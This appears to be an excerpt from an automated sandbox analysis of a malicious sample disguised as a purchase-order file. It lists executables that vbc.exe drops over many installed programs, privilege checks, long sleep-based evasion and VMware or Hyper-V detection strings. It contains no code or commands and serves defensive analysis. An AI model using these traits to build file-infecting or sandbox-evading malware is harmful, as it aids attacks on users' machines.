                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeDropped PE file which has not been started: C:\Windows\System32\sppsvc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Windows\System32\SensorDataService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_25-5737
                  Source: C:\Windows\System32\snmptrap.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_26-5725
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_18-10412
                  Source: C:\Windows\System32\wbengine.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_19-5619
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_9-61550
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_21-5423
                  Source: C:\Windows\System32\vds.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\FXSSVC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_17-5652
                  Source: C:\Windows\System32\msdtc.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_20-5641
                  Source: C:\Windows\System32\Spectrum.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\AgentService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_15-5709
                  Source: C:\Windows\System32\TieringEngineService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\Locator.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_24-5757
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe TID: 7336Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\alg.exe TID: 7920Thread sleep time: -90000s >= -30000s
                  Source: C:\Windows\System32\alg.exe TID: 7896Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\msdtc.exe TID: 2724Thread sleep count: 469 > 30
                  Source: C:\Windows\System32\msdtc.exe TID: 2724Thread sleep time: -46900s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe TID: 7744Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4580Thread sleep count: 1856 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4580Thread sleep time: -18560000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4580Thread sleep count: 8110 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4580Thread sleep time: -81100000s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F4DF57 FindFirstFileW,9_2_00F4DF57
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: Spectrum.exe, 0000001B.00000002.2622744368.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;Microsoft Hyper-V Generation Counter\
                  Source: SensorDataService.exe, 00000019.00000003.1528720544.0000000000574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Deviceb
                  Source: Spectrum.exe, 0000001B.00000003.1442834952.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MicStandard USB 3.1 eXtensible Host Controller - 1.0 (Microsoft) Host Controller - %3 (Microsoft);(Standard,3.1,1.0)sk&Ven_VMware&Pro
                  Source: SensorDataService.exe, 00000019.00000003.1431266016.0000000000571000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000019.00000003.1430472165.0000000000571000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1443011792.0000000000643000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1444167092.000000000065A000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1444015317.000000000065A000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1441055520.0000000000640000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1442834952.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
                  Source: SensorDataService.exe, 00000019.00000003.1528720544.0000000000574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
